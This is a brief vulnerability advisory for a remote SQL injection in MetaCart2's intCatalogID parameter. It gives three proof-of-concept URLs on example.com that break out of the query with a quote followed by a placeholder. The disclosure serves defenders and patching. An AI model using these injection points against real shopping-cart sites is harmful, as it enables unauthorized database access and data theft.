MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability

MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability

No exploit is required to leverage this issue.

The following proofs of concept are available:

http://www.example.com/mcart2pfp/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
http://www.example.com/mcart2pal/productsByCategory.asp?intCatalogID=%27SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
http://www.example.com/mcart2sqluk/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bpage=2